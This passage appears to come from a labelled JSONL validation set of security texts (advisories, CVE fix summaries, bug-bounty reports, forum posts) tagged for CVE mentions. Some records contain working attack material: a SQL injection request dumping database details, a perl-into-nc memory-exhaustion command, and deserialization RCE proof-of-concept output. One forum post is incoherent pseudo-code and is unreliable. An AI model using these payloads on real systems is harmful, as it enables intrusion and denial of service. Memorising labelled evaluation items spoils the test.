6.0.22\n[Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.21 | 6.0.22\n[Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.21 | 6.0.22\n\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.300\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.300 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Micros", "source": "github_advisory", "timestamp": "2023-09-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f93db1f66bfda3b00a1f", "text": "Hey! Thanks for reaching out. You’re more than welcome to jump on the squad and hack with us! You’ll just need to search for the team name strataGEM , then look for the the request to join button. I’ll be on the lookout and accept the request. After that I’ll shoot you a link to the discord. Look forward to hearing from you. -apollyon", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2817fd8ff27c86cd2e9c", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fdf9f224210172a24bb1", "text": "CVE: CVE-2022-23059\n\n[{'lang': 'en', 'value': 'A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0 via the “Manage Images” tab, which allows an attacker to upload a SVG file containing malicious JavaScript code.'}]\n\nFix commit: working version 3.0.alpha", "source": "cvefixes", "timestamp": "2022-03-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b1be894881b10f74f2d6", "text": "CVE: CVE-2022-25898\n\n[{'lang': 'en', 'value': 'The package jsrsasign before 10.5.25 are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake. Workaround: Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.'}]\n\nFix commit: CVE-2022-25898 Security fix in JWS and JWT validation", "source": "cvefixes", "timestamp": "2022-07-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "649024918f601a4e9d22", "text": "CVE: CVE-2022-31071\n\n[{'lang': 'en', 'value': 'Octopoller is a micro gem for polling and retrying. Version 0.2.0 of the octopoller gem was published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem. This issue is patched in Octopoller 0.3.0. Two workarounds are available. Users can use the previous version of the gem, v0.1.0. Alternatively, users can modify the file permissions manually until they are able to upgrade to the latest version.'}]\n\nFix commit: Merge pull request #25 from octokit/updates-release-steps-checks\n\nAdds details on how to run a manual file integrity check", "source": "cvefixes", "timestamp": "2022-06-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9fb2a6c6d3a96b37e5f1", "text": "CVE: CVE-2021-4213\n\n[{'lang': 'en', 'value': 'A flaw was found in JSS, where it did not properly free up all memory. Over time, the wasted memory builds up in the server memory, saturating the server’s RAM. This flaw allows an attacker to force the invocation of an out-of-memory process, causing a denial of service.'}]\n\nFix commit: Fix memory leak on each TLS connection\n\nEach TLS connection is leaking a bunch of data that isn't in the heap\nand so after 25k requests Tomcat uses about 2.5GB resident memory.\n\nThere are large number of relationships that point at each other and we\nneed to break the cycle so JSSEngineReferenceImpl's finalizer can run\nand clear all the native resources these point at.\n\nThe lowest impact place to break the cycle was at SSLAlertEvent.engine.\nThis relationship doesn't seem to be used anywhere. Once the cycle is\nbroken, JSSEngineReferenceImpl can be garbage collected and the\nfinalizer can run.\n\nSigned-off-by: Chris Kelley ", "source": "cvefixes", "timestamp": "2022-08-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0488485d35936cff9d70", "text": "This is the reply that helped me the most if you’re stuck. Happy Wizard hunting all!", "source": "hackthebox", "timestamp": "2022-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "06d92fe77c924396b3fb", "text": "CVE: CVE-2022-1849\n\n[{'lang': 'en', 'value': 'Session Fixation in GitHub repository filegator/filegator prior to 7.8.0.'}]\n\nFix commit: regenerate session on user update", "source": "cvefixes", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "52b35fa744716807bee9", "text": "CVE: CVE-2021-46461\n\n[{'lang': 'en', 'value': 'njs through 0.7.0, used in NGINX, was discovered to contain an out-of-bounds array access via njs_vmcode_typeof in /src/njs_vmcode.c.'}]\n\nFix commit: Added missing element in typeof table for DataView() type.\n\nPreviously, typeof operation for DataView object resulted\nin out of bounds array accessing.\n\nThis fixes #450 issue on Github.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c974e4c0fae9821058fe", "text": "yeah happened to me just right now after exiting the shell all php files where getting me 504 @everyone here can u reset the machine", "source": "hackthebox", "timestamp": "2023-11-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2cedfff9ca8358860470", "text": "I was stuck on this too, simply because I wasn’t using sudo in my command. I STRONGLY DISAGREE that sudo should be a requirement for this question. Sudo is not required to read a pcap file in /tmp–even if sudo was used to create the pcap. Change my mind (this is a general comment, not a specific reply to @laurenchen0631 )", "source": "hackthebox", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e7e8a847dc86d9148a03", "text": "I tried all options and receive the error. I enter also listing the files on /var/lib/dpkg/info", "source": "hackthebox", "timestamp": "2023-07-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ce1aae6291166fcdb83b", "text": "rufus/parrot\n\nok so im completly new, and need a little help here for a project annnnd i cant get parrot to run on my computer i tried creating a iso on a flkash drive and cannot get it to run whatso ever do i need to put a virtual machine along side of it?", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "203d442130a2f4cc26dd", "text": "YARP Denial of Service Vulnerability\n\n[Severity: HIGH]\n\n### Impact\n\nA denial of service vulnerability exists in how YARP processes input.\n\n### Patches\n\nIf you're using YARP `1.0.0`, you should update to NuGet package version [`1.0.1`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.0.1).\nIf you're using YARP `1.1.0-RC.1`, you should update to NuGet package version [`1.1.0-rc.1.22211.2`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.0-rc.1.22211.2).\n\nYou can do so by updating the `PackageReference` in your `.csproj` file\n```diff\n\n- \n- \n+ \n+ \n \n```\nor by selecting `1.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`)\n\n\n### References\n\n[CVE-2022-26924](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924)", "source": "github_advisory", "timestamp": "2022-04-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5698614d3806d33d8efc", "text": "CVE: CVE-2022-24881\n\n[{'lang': 'en', 'value': 'Ballcat Codegen provides the function of online editing code to generate templates. In versions prior to 1.0.0.beta.2, attackers can implement remote code execution through malicious code injection of the template engine. This happens because Velocity and freemarker templates are introduced but input verification is not done. The fault is rectified in version 1.0.0.beta.2.'}]\n\nFix commit: :lock: 修改模板引擎的默认安全策略,以防止RCE", "source": "cvefixes", "timestamp": "2022-04-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "98b2b3b7c62d763aeda5", "text": "First of all, I would like to advise you that hacking into someone's computer without their consent is illegal and unethical. It is important to respect people's privacy and security. Regarding your question, netstat -n is a command that displays the current TCP/IP connections on your computer, along with the associated IP addresses and port numbers. However, it does not provide information about the identities of the remote IP addresses. If you want to find the IP address of your friend, you can ask them directly or use a legitimate IP lookup tool. There are several websites and tools available online that can help you find the IP address of a person, such as whatismyip.com or iplocation.net. However, it is important to note that using these tools without the person's consent can be considered a violation of their privacy. It is important to always respect people's privacy and not engage in any illegal or unethical activities.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f167f8bc8707ceb5cba5", "text": "crankor: How will I know that they talk about Harry Potter, is that I have a crystal ball, These reots should improve the context,I know it’s about Harry because I’ve read it on the forum but I don’t know when it would have occurred to me that it was about Howards Academy I did parts of the assessment on several days, so I had no chance to still remember the name Harry from the previous exercise… Now I am stuck at the very last question: I found the second username and tries rockyou-30 as instructed. However, no chance to brute force into his SSH account. I tried both routes, from the internal 0.0.0.0.:80 address, as well the external IP address. Any additional suggestions or hints? Thank you!", "source": "hackthebox", "timestamp": "2022-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0f53021ee6405d0f3c6f", "text": "@minTwin I recommend using the Visual Studio IDE(community), as for the libraries you wont need something too complex. The steps were all explained, you need to make a loop that sends something and until that something is found it will keep running. I also recommend having some “Console.Writeline” so that you’ll see how many attempts were made as well as knowing which string was the correct one", "source": "hackthebox", "timestamp": "2023-11-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d2e3a2ec46a232bfc194", "text": "Finally found the code injection that got the flag.txt to appear on the /tmp page, and I respawned the server to double check and make sure it was right. What did it was finding which URL-Encoded characters worked, where to input them, and most importantly, refreshing the /tmp webpage to see if the flag.txt appeared even though an error appeared under the “message alert” in Burp. I incorrectly assumed the error meant that the command was unsuccessful, oops…", "source": "hackthebox", "timestamp": "2022-07-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c94fe0a212565c84223f", "text": "If you can debug a bit, you will know ${LS_COLORS} doesn’t exist.", "source": "hackthebox", "timestamp": "2022-07-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "dee2920d0633a1e19b7d", "text": "Jenkins Thycotic DevOps Secrets Vault Plugin does not properly mask credentials\n\n[Severity: MEDIUM]\n\nMultiple Jenkins plugins do not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like sh and bat, when both of the following conditions are met:\n\n- The credentials are printed in build steps executing on an agent (typically inside a node block).\n\n- Push mode for durable task logging is enabled. This is a hidden option in Pipeline: Nodes and Processes that can be enabled through the Java system property org.jenkinsci.plugins.workflow.steps.durable_task.DurableTaskStep.USE_WATCHING. It is also automatically enabled by some plugins, e.g., OpenTelemetry and Pipeline Logging over CloudWatch.\n\nThe following plugins are affected by this vulnerability:\n\n- Kubernetes 3909.v1f2c633e8590 and earlier (SECURITY-3079 / CVE-2023-30513)\n\n- Azure Key Vault 187.va_cd5fecd198a_ and earlier (SECURITY-3051 / CVE-2023-30514)\n\n- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)\n\nThe following plugins have been updated to properly mask credentials in the build log when push mode for durable task logging is enabled:\n\n- Kubernetes 3910.ve59cec5e33ea_ (SECURITY-3079 / CVE-2023-30513)\n\n- Azure Key Vault 188.vf46b_7fa_846a_1 (SECURITY-3051 / CVE-2023-30514)\n\nAs of publication of this advisory, there is no fix available for the following plugin:\n\n- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)", "source": "github_advisory", "timestamp": "2023-04-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "dd8d51112c9cb21ec3ce", "text": "CVE: CVE-2022-23615\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with SCRIPT right can save a document with the right of the current user which allow accessing API requiring programming right if the current user has programming right. This has been patched in XWiki 13.0. Users are advised to update to resolve this issue. The only known workaround is to limit SCRIPT access.'}]\n\nFix commit: XWIKI-5024: Document potentially saved with the wrong author\n* add an configuration off switch", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fd8cc4d58651e970489d", "text": "SnakeYaml Constructor Deserialization Remote Code Execution\n\n[Severity: HIGH]\n\n### Summary\nSnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows\nany type be deserialized given the following line:\n\nnew Yaml(new Constructor(TestDataClass.class)).load(yamlContent);\n\nTypes do not have to match the types of properties in the\ntarget class. A `ConstructorException` is thrown, but only after a malicious\npayload is deserialized.\n\n### Severity\nHigh, lack of type checks during deserialization allows remote code execution.\n\n### Proof of Concept\nExecute `bash run.sh`. The PoC uses Constructor to deserialize a payload\nfor RCE. RCE is demonstrated by using a payload which performs a http request to\nhttp://127.0.0.1:8000.\n\nExample output of successful run of proof of concept:\n\n```\n$ bash run.sh\n\n[+] Downloading snakeyaml if needed\n[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE\nnc: no process found\n[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.\n[+] An exception is expected.\nException:\nCannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0\n in 'string', line 1, column 1:\n payload: !!javax.script.ScriptEn ... \n ^\nCan not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n in 'string', line 1, column 10:\n payload: !!javax.script.ScriptEngineManag ... \n ^\n\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)\n\tat org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)\n\tat org.yaml.snakeyaml.Yaml.load(Yaml.java:416)\n\tat Main.main(Main.java:37)\nCaused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)\n\tat java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)\n\tat java.base/java.lang.reflect.Field.set(Field.java:780)\n\tat org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)\n\t... 9 more\n[+] Dumping Received HTTP Request. Will not be empty if PoC worked\nGET /proof-of-concept HTTP/1.1\nUser-Agent: Java/11.0.14\nHost: localhost:8000\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\n```\n\n### Further Analysis\nPotential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.\n\nSee https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.\n\n### Timeline\n**Date reported**: 4/11/2022\n**Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n**Date disclosed**: 10/13/2022", "source": "github_advisory", "timestamp": "2022-12-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7da217c0aa78b92891af", "text": "CVE: CVE-2022-24762\n\n[{'lang': 'en', 'value': 'sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages.'}]\n\nFix commit: fix security issue with Cross-Domain communication #33", "source": "cvefixes", "timestamp": "2022-03-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "223e65adf5ac6b67b00b", "text": "UMAC - Universal Macintosh- Applet\n\nNow in brute force you got to ping the server for the access to winmap -Winamp is used for collection services based upon the status, or stats of the object … BASH Example > > .index = 0; > .num1 = “applet-data-usage”; > .interface = 1028; > > For (index = 0; index < 1028; ++num1){ > > > > ++index; > > ++num1; > > interface = interface * index; } $interface = num1; Usually used somewhat like a pointer class or integer there is another set Blockquote cat graph2.dll >> graph2.rar;", "source": "hackersploit", "timestamp": "2022-05-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2537fb2d3288c60bbdd8", "text": "Improper random number generation in github.com/coredns/coredns\n\n[Severity: MEDIUM]\n\n### Impact\n\nCoreDNS before 1.6.6 (using go DNS package < 1.1.25) improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.\n\n### Patches\nThe problem has been fixed in 1.6.6+.\n\n### References\n- [CVE-2019-19794](https://nvd.nist.gov/vuln/detail/CVE-2019-19794)\n\n### For more information\nPlease consult [our security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.\n", "source": "github_advisory", "timestamp": "2022-03-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f40dea6c163ded6ffbae", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-07-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e2177aa3c3cfd3d27865", "text": "Dig: is anyone familiar with this unexpected output?\n\nI was playing around with the dig command and received some unexpected output. Because I’m not familiar with it I thought I’d ask if anyone else has seen it before and can tell me to what it’s referring. Samples below: add 0x55b5a8f2f8b8 size 32 file …/crypto/lhash/lhash.c line 109 mctx 0x55b5a8e6ca40 add 0x55b5a8f28778 size 40 file …/crypto/buffer/buffer.c line 35 mctx 0x55b5a8e6ca40 add 0x55b5a8eb2178 size 592 file …/crypto/err/err.c line 689 mctx 0x55b5a8e6ca40 add 0x55b5a8eb93f8 size 20 file …/crypto/init.c line 66 mctx 0x55b5a8e6ca40 add 0x7f72e1c17010 size 56 file …/…/…/lib/isc/heap.c line 88 mctx 0x55b5a8dcf140 add 0x7f72e1c18010 size 224 file …/…/…/…/lib/isc/unix/socket.c line 4632 mctx 0x55b5a8dcf140 add 0x7f72e1c12230 size 32 file …/…/…/lib/isc/log.c line 1068 mctx 0x55b5a8dcf140", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5cff1538fd9d3658b917", "text": "CVE: CVE-2022-31121\n\n[{'lang': 'en', 'value': 'Hyperledger Fabric is a permissioned distributed ledger framework. In affected versions if a consensus client sends a malformed consensus request to an orderer it may crash the orderer node. A fix has been added in commit 0f1835949 which checks for missing consensus messages and returns an error to the consensus client should the message be missing. Users are advised to upgrade to versions 2.2.7 or v2.4.5. There are no known workarounds for this issue.'}]\n\nFix commit: Check if inner consensus message is missing\n\nChange-Id: I06b466e6ff6d43f2b9804dd21185241716356050\nSigned-off-by: Yacov Manevich \n(cherry picked from commit 6e5e693a2d12aabee4bcf103ab7de3df4ccc49f9)", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6724ea2398b1c55cb349", "text": "CVE: CVE-2022-2210\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5164: invalid memory access after diff buffer manipulations\n\nProblem: Invalid memory access after diff buffer manipulations.\nSolution: Use zero offset when change removes all lines in a diff block.", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "44c35bca4386c138ff1f", "text": "On the Guided Lab: Traffic Analysis Workflow section, there really should be a highly visible message to use the provided pcap in the guided-analysis.zip resource. I tried for some time trying to capture the required network traffic for the questions on the NoMachine host but never got anything that matched up with the questions being asked. Finally diving into the provided pcap, I found it instantly. I really think that an emphasis on using those provided resources would save people a lot of headache, especially in this introduction courses.", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "88fded51ab7a14212d21", "text": "[Cross-site Scripting (XSS) - Reflected] CVE-2021-42567 - Apereo CAS Reflected XSS on https://█████████\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. CAS is vulnerable to a Reflected Cross-Site Scripting attack, via POST requests sent to the REST API endpoints. The payload could be injected on URLs: /███████/. Malicious scripts can be submitted to CAS via parameters such as the ticket id or the username. That results in CAS rejecting the request and producing a response in which the value of the vulnerable parameter is echoed back, resulting in its execution.\n\nVULNERABLE SITE: https://██████████\n\nVULNERABLE ENDPOINT: https://███████/█████████/\n\nPROOF OF CONCEPT:\n-----------------------\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Impact\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. \n\nREFERENCES :\n---------------\n * https://apereo.github.io/2021/10/18/restvuln/\n * https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html\n * https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md\n * https://nvd.nist.gov/vuln/detail/CVE-2021-42567\n * https://github.com/apereo/cas/releases\n\nBest Regards,\n3th1c_yuk1\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nApereo CAS\n\n## CVE Numbers\nCVE-2021-42567\n\n## Steps to Reproduce\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Suggested Mitigation/Remediation Actions\nYou should check the server's version and update to ... not the versions 6.3.7.1 and 6.4.2, but the versions 6.3.7.4 and 6.4.4.2 to mitigate this XSS.", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7eb01181e5370a6c6af1", "text": "Auto Dealer Management System v1.0 - SQL Injection on manage_user.php\n\n# Exploit Title: Auto Dealer Management System v1.0 - SQL Injection on manage_user.php\n# Exploit Author: Muhammad Navaid Zafar Ansari\n# Date: 18 February 2023\n\n\n### CVE Assigned:\n**[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915)\n\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)\n### Version:\n> v 1.0\n\n# Tested on: Windows 11\n\n### SQL Injection\n> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.\n### Affected Page:\n> manage_user.php\n\n> On this page id parameter is vulnerable to SQL Injection Attack\n\n> URL of the vulnerable parameter is: ?page=user/manage_user&id=*\n\n### Description:\n> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below\n+ Admin user has full access to the system\n+ Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)\n> Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system.\n\n### Proof of Concept:\n> Following steps are involved:\n1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*)\n### Request:\n```\nGET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1\nHost: localhost\nsec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5\nConnection: close\n```\n\n### Response:\n\n\n\n### Recommendation:\n> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:\n```\nExample Code:\n$sql = $obj_admin->db->prepare(\"SELECT * FROM users where id = :id \");\n$sql->bindparam(':id', $id);\n$sql->execute();\n$row = $sql->fetch(PDO::FETCH_ASSOC);\n```\nThank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f6eb684167873042f97d", "text": "CVE: CVE-2022-23603\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-3xpp-rhqx-cw96\n\nsec fix", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "768cc605c722124822e3", "text": "CVE: CVE-2021-25992\n\n[{'lang': 'en', 'value': 'In Ifme, versions 1.0.0 to v.7.33.2 don’t properly invalidate a user’s session even after the user initiated logout. It makes it possible for an attacker to reuse the admin cookies either via local/network access or by other hypothetical attacks.'}]\n\nFix commit: Call invalidate_all_sessions in prepend_before_action", "source": "cvefixes", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2561d3c72fca0ca2b8eb", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\n## Summary:\nCurl does not prevent resource consumption when processing certain header types, but keeps on allocating more and more resources until the application terminates (or the system crashes, see below).\n\nThe attack vectors include (at least):\n- Sending many `Transfer-Encoding`with repeated encodings such as \"gzip,gzip,gzip,...\"\n- if `CURLOPT_ACCEPT_ENCODING` is set sending many `Content-Encoding` with repeated encodings such as \"gzip,gzip,gzip,...\"\n- Sending many `Set-Cookie` with unique cookie names and about 4kbyte value\n\n## Steps To Reproduce:\n 1.Run the following HTTP server:\n `perl -e 'print \"HTTP/1.1 200 OK\\r\\n\";for (my $i=0; $i < 10000000; $i++) { printf \"Transfer-Encoding: \" . \"gzip,\" x 20000 . \"\\r\\n\"; }' | nc -v -l -p 9999`\n 2. `curl http://localhost:9999`\n\nThe application will terminate when it runs out of memory.\n\nOn macOS the app dies due to OOM:\n```\nKilled: 9\n$ echo $?\n137\n```\n\nOn linux it's the same:\n```\nKilled\n$ echo $?\n137\n```\n\nWhen targeting Windows 11 system the system would stop responding. Once the attack script was terminated the system would not recover after 10 minutes of waiting. While it was possible to log on to the system the display would remain black. Rebooting the system was necessary to recover the system to a working state. This of course is likely due to bugs in the Windows operating system or drivers.\n\nOn other platforms nasty effects may also occur, such as causing extreme swapping or a system crash. Depending on how the system handles the application gobbling all memory it may result in collateral damage, for example when kernel attempts to release system resources by killing processes.\n\n## Impact\n\n- Uncontrolled resource consumption\n- Uncontrolled application termination\n- System crash (on some platforms)", "source": "hackerone", 